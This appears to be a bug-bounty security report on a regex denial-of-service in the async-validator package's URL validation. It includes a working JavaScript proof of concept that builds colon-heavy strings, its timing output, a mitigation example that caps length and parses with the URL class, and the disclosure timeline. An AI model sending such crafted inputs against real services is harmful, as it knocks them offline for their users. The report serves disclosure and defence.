Inefficient Regular Expression Complexity in yiminghe/async-validator
Valid
Reported on Sep 12th 2021
✍️ Description
This allows an attacker to cause a denial of service when validating crafted invalid URLs.
🕵️♂️ Proof of Concept
// PoC.js
var asyncValidator = require("async-validator")

// Schema with a single field validated as type 'url'
const validator = new asyncValidator.default({
  v: {
    type: 'url',
  },
})

for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  // Input grows by 10000 ':' characters on each iteration
  var attack_str = '//' + ':'.repeat(i*10000) + '@';
  validator.validate({
    v: attack_str,
  });
  // Time spent validating this input
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
💥 The Output
attack_str.length: 10003: 203 ms
attack_str.length: 20003: 612 ms
attack_str.length: 30003: 1316 ms
attack_str.length: 40003: 2337 ms
attack_str.length: 50003: 3656 ms
attack_str.length: 60003: 5264 ms
attack_str.length: 70003: 7158 ms
attack_str.length: 80003: 9350 ms
attack_str.length: 90003: 11906 ms
attack_str.length: 100003: 14648 ms
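One way to keep URL validation cost bounded for inputs shaped like the PoC's, as an added example that is not part of the original report or of async-validator's code: reject over-long strings before any matching, then parse with the WHATWG `URL` class. `MAX_URL_LENGTH`, the accepted schemes, the handling of `//` URLs and all helper names are assumptions.

```javascript
// Added example: length-bounded, parser-based URL check (not async-validator's code).
// MAX_URL_LENGTH and ALLOWED_PROTOCOLS are assumptions; tune them for your application.
const MAX_URL_LENGTH = 2048;
const ALLOWED_PROTOCOLS = ['http:', 'https:', 'ftp:'];

function isValidUrl(value, maxLength = MAX_URL_LENGTH) {
  if (typeof value !== 'string') return false;
  // Cheap reject: over-long input never reaches a parser or a regex.
  if (value.length === 0 || value.length > maxLength) return false;
  // Assumption: protocol-relative URLs ("//host/path") are accepted and parsed as http.
  const candidate = value.startsWith('//') ? 'http:' + value : value;
  let parsed;
  try {
    parsed = new URL(candidate); // WHATWG URL parser instead of a backtracking regex
  } catch {
    return false; // not parseable as an absolute URL
  }
  return ALLOWED_PROTOCOLS.includes(parsed.protocol) && parsed.hostname.length > 0;
}

// Builds the input shape used by the report's PoC, for regression tests.
function reportShapedInput(colons) {
  return '//' + ':'.repeat(colons) + '@';
}

// Returns { ok, ms }: the verdict and the wall-clock cost of one check.
function timedCheck(value, maxLength = MAX_URL_LENGTH) {
  const start = Date.now();
  const ok = isValidUrl(value, maxLength);
  return { ok, ms: Date.now() - start };
}

// Constructed samples: two well-formed URLs, then report-shaped inputs
// below and above the length limit.
const samples = [
  'https://example.com/path?q=1',
  '//example.com/x',
  reportShapedInput(2000),
  reportShapedInput(100000),
];
for (const s of samples) {
  const { ok, ms } = timedCheck(s);
  console.log(`length ${s.length}: valid=${ok}, ${ms} ms`);
}
```

A regression test can assert that the 100003-character input from the output table above is rejected within a fixed time budget.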
Occurrences
We created a GitHub Issue asking the maintainers to create a SECURITY.md (2 years ago)
We have contacted a member of the yiminghe/async-validator team and are waiting to hear back (2 years ago)
https://github.com/yiminghe/async-validator/commit/0e9a1640aef674f6b6bdc177e8ea405724aa4fb4
type.ts#L10 has been validated
As mentioned in the other report, we no longer assign CVEs against this vulnerability type.